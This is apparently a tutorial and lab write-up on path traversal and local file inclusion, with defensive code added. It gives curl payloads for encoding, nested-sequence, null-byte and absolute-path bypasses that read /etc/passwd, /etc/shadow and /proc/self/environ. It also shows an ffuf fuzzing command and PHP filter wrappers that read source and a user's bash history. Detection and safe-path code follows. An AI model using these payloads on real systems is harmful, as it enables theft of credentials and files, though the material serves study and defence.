Path Traversal

Path traversal is also known as directory traversal. These vulnerabilities let an attacker read arbitrary files on the server that is running the application, for example:

  • Environment variables.
  • Running program details.
  • Application code and data.
  • Credentials for back-end systems.
  • Sensitive operating system files.

Reading arbitrary files via path traversal

Most common way (file path traversal, simple case)

[Original]
curl -s https://0a42008e046aadb78126bbdb001f000c.web-security-academy.net/image?filename=50.jpg 

[Final]
curl -s https://0a42008e046aadb78126bbdb001f000c.web-security-academy.net/image?filename=../../../../etc/passwd

Common obstacles to exploiting path traversal vulnerabilities

Applications often try to block traversal with input filters; attackers frequently get past these obstacles through:

URL Encoding

Using encoded sequences such as %2e%2e%2f, or double-encoded %252e%252e%252f, to bypass basic filters that only look for a literal ../.

[Way 1]

..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

URL-encoding it:
curl -s https://0a610034030cdad383a16e4f00640069.web-security-academy.net/image?filename=%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%65%74%63%25%32%66%70%61%73%73%77%64

[Way 2]

..%252f..%252f..%252fetc/passwd

curl -s https://0a610034030cdad383a16e4f00640069.web-security-academy.net/image?filename=..%252f..%252f..%252fetc/passwd

Absolute Paths

Directly referencing sensitive files from the root (e.g., /etc/passwd) to avoid using traversal sequences entirely.

curl -s https://0aa6006804a1ad708104c0fb000d004e.web-security-academy.net/image?filename=/etc/passwd

Nested Sequences

Using patterns like ....// that collapse to ../ when a filter strips the inner ../ once, non-recursively.

curl -s https://0a18008703e9344681ad8eec005a0015.web-security-academy.net/image?filename=....//....//....//....//....//....//....//....//etc/passwd

Null Byte Injection

Appending a null byte (e.g., ../../../etc/passwd%00.png) so that the file path is truncated before a required extension.

curl -s https://0a34003d04a2c03680542bcf00a30033.web-security-academy.net/image?filename=../../../../../../../etc/passwd%00.jpg

curl -s https://0a34003d04a2c03680542bcf00a30033.web-security-academy.net/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.jpg

Path Traversal Through the Expected Base Folder

When the application only checks that the supplied path starts with its expected base folder, prefix that folder and traverse out of it, like this: filename=/var/www/images/../../../etc/passwd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=/var/www/images/../../../../etc/passwd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=/var/www/images/..%2f..%2f..%2f..%2fetc%2fpasswd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=%2fvar%2fwww%2fimages%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Non-Standard Encodings

Exploiting overlong UTF-8 encodings or non-standard characters such as ..%c0%af that different decoders may interpret differently.
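Each of the evasions above leaves a recognizable trace in the web server's access log. The scanner below is an added example written for this post, not code from the original: it percent-decodes request parameters until stable and flags the patterns discussed (double encoding, nested sequences, null bytes, overlong UTF-8, absolute paths in a file parameter). The log lines and the parameter names in FILE_PARAMS are constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit
# Added example, not code from the original post: flag access-log requests
# carrying the evasions above (encoded/double-encoded '../', nested '....//',
# null bytes, overlong UTF-8, absolute file paths); FILE_PARAMS is assumed.
REQ_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')
DOTS_SLASH = re.compile(r"\.\.+[\\/]")                # ../  ..\  ....//
OVERLONG = re.compile(r"%c0%a[ef]|%e0%80%af", re.I)   # overlong '.' and '/'
FILE_PARAMS = {"filename", "file", "path", "page", "name"}

def decode_fully(value, rounds=3):
    # Percent-decode until stable so double encoding cannot hide "../".
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_uri(uri):
    """Return the sorted reasons a request URI looks like path traversal."""
    reasons = set()
    parts = urlsplit(uri)
    pairs = [kv.partition("=") for kv in parts.query.split("&") if kv]
    for key, _, raw in [("", "", parts.path)] + pairs:
        if OVERLONG.search(raw):          # must be checked before decoding
            reasons.add("overlong UTF-8 encoding")
        decoded = decode_fully(raw)
        if "\x00" in decoded:
            reasons.add("null byte")
        if DOTS_SLASH.search(decoded):
            reasons.add("dot-dot-slash sequence")
        if key in FILE_PARAMS and decoded.startswith("/"):
            reasons.add("absolute path in parameter")
    return sorted(reasons)

def scan_log(lines):
    """Map 1-based line numbers of suspicious requests to their reasons."""
    found = ((n, REQ_RE.search(l)) for n, l in enumerate(lines, 1))
    hits = {n: inspect_uri(m.group("uri")) for n, m in found if m}
    return {n: r for n, r in hits.items() if r}

SAMPLE_LOG = [  # constructed combined-log lines so the scanner runs offline
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /image?filename=50.jpg HTTP/1.1" 200 2326',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /image?filename=..%252f..%252fetc/passwd HTTP/1.1" 200 1984',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /image?filename=....//....//etc/passwd HTTP/1.1" 200 1984',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /image?filename=../../etc/passwd%00.jpg HTTP/1.1" 200 1984',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /image?filename=/etc/passwd HTTP/1.1" 200 1984',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /image?filename=..%c0%af..%c0%afetc/passwd HTTP/1.1" 400 0',
]
```

Running scan_log(SAMPLE_LOG) flags every line except the first; note the overlong check runs on the raw value, because unquote() replaces those bytes and the pattern would be lost after decoding.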

How to prevent a path traversal attack

  • Input validation and allow-listing: accept only known-good filenames rather than trying to block-list traversal sequences.
  • Canonicalize and validate the path: resolve the user-supplied value against the base directory and check that the canonical result still lies inside it.
  • Principle of least privilege: run the application with a user that cannot read files it does not need.
  • Avoid direct user input: serve files by an identifier or index instead of a user-supplied filename.

Additional measures: store sensitive files outside the web root, disable directory listings, and keep software and dependencies updated.
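The canonicalize-and-validate advice in practice, as an added example (not code from the original post or from the academy labs): the helper below resolves the requested name against an assumed base directory /var/www/images, rejects null bytes and absolute paths, and checks that the canonical path is still inside the base before allow-listing the extension. It therefore also handles the base-folder prefix case above, since an absolute path is refused outright and a relative one is canonicalized instead of merely prefix-checked.

```python
import os
from urllib.parse import unquote

# Added example, not code from the original post: a file-serving helper that
# applies the prevention list above (decode, reject null bytes and absolute
# paths, canonicalize, confine to the base directory, allow-list extensions).
BASE_DIR = os.path.realpath("/var/www/images")  # assumed document root
ALLOWED_EXT = {".jpg", ".png"}

def safe_image_path(user_filename, base_dir=BASE_DIR):
    """Return the canonical on-disk path for a requested image or raise."""
    # Decode until stable (bounded) so %2e%2e%2f and double-encoded
    # %252e%252e%252f are both judged in their final, decoded form.
    name = user_filename
    for _ in range(3):
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    if "\x00" in name:
        raise ValueError("null byte in filename")
    if os.path.isabs(name):
        raise ValueError("absolute path rejected")
    # Canonicalize instead of stripping: "../" segments and symlinks are
    # resolved, and "....//" is just an odd directory name, not a traversal.
    candidate = os.path.realpath(os.path.join(base_dir, name))
    if os.path.commonpath([base_dir, candidate]) != base_dir:
        raise ValueError("path escapes base directory")
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    return candidate

def is_allowed(user_filename):
    try:
        safe_image_path(user_filename)
        return True
    except ValueError:
        return False

# Constructed requests mirroring the payload shapes shown on this page.
SAMPLE_REQUESTS = [
    "50.jpg", "sub/dir/photo.PNG",
    "../../../../etc/passwd", "..%2f..%2f..%2f..%2fetc%2fpasswd",
    "..%252f..%252f..%252fetc/passwd", "/etc/passwd",
    "....//....//....//etc/passwd", "../../../etc/passwd%00.jpg",
    "/var/www/images/../../../../etc/passwd",
]

def classify(requests=SAMPLE_REQUESTS):
    return {r: is_allowed(r) for r in requests}
```

classify() returns True only for the two legitimate image names; the nested ....// request stays inside the base directory after canonicalization and is then refused by the extension allow-list.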

Practical Examples

Example 1

Simple LFI

curl -sI $URL    (-s = silent, -I = fetch the response headers only)
The response headers show a redirect to Location: /page?name=home.html

> curl -s https://google.io/page?name=/etc/passwd
> curl -s https://google.io/page?name=/etc/shadow
> curl -s https://google.io/page?name=/proc/self/environ

PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
HOSTNAME=feabaa3efac2FLAG=flag{cb76c013f6984fb8d96d2df5602e10e1}
LANG=C.UTF-8GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
PYTHON_VERSION=3.11.15
PYTHON_SHA256=272179ddd9a2e41a0fc8e42e33dfbdca0b3711aa5abf372d3f2d51543d09b625
HOME=/root

Example 2

FUZZING LFI Files

The web site lets you view log files such as auth.log, deploy.log, view.log or error.log:

https://google.io/logs/view?file=file_name

FUZZ it!
ffuf -u https://google.io/logs/view?file=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -fw 5560 

> %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
> %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/shadow
> %252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fproc/self/environ

PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
HOSTNAME=9c6aa57b4f36FLAG=flag{7deb95a825f7b16a66583df98912c6a8}
LANG=C.UTF-8
GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
PYTHON_VERSION=3.11.15
PYTHON_SHA256=272179ddd9a2e41a0fc8e42e33dfbdca0b3711aa5abf372d3f2d51543d09b625
HOME=/root

Example 3

Apply PHP Wrappers to Read local files

Found an LFI in a file download endpoint:   download.php?file=file_name

> curl "http://app.google.io/download.php?file=....//....//....//etc/passwd"
Invalid file path.  
> curl "http://app.google.io/download.php?file=..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00"
<br />
<b>Fatal error</b>:  Uncaught ValueError: readfile(): Argument #1 ($filename) must not contain any null bytes in /var/www/html/download.php:33
Stack trace:
#0 /var/www/html/download.php(33): readfile('..2f..2f..2f..2...')
#1 {main}
  thrown in <b>/var/www/html/download.php</b> on line <b>33</b><br />

[PHP Wrappers]
> curl "http://app.google.io/download.php?file=php://filter/read=convert.base64-encode/resource=/etc/passwd" | base64 -d 

Reading local PHP source files (index.php, download.php):
> curl "http://app.google.io/download.php?file=php://filter/read=convert.base64-encode/resource=index.php" | base64 -d 

require_once __DIR__ . '/src/config.php';   <--stored website config
require_once __DIR__ . '/src/Database.php'; <--stored db config
require_once __DIR__ . '/src/Auth.php';
require_once __DIR__ . '/src/Router.php';
require_once __DIR__ . '/src/helpers.php';


> cat passwd | grep -i 'sh$'
root:x:0:0:root:/root:/bin/bash
eric:x:1001:1001::/home/eric:/bin/bash

[Reading local files of the eric user]:
> curl "http://app.google.io/download.php?file=php://filter/read=convert.base64-encode/resource=/home/eric/bash_history" | base64 -d 

> curl "http://app.google.io/download.php?file=php://filter/read=convert.base64-encode/resource=/home/eric/flag.txt" | base64 -d 
flag{php_f1lt3r_3r1c_h0m3_lf1}
This post is licensed under CC BY 4.0 by the author.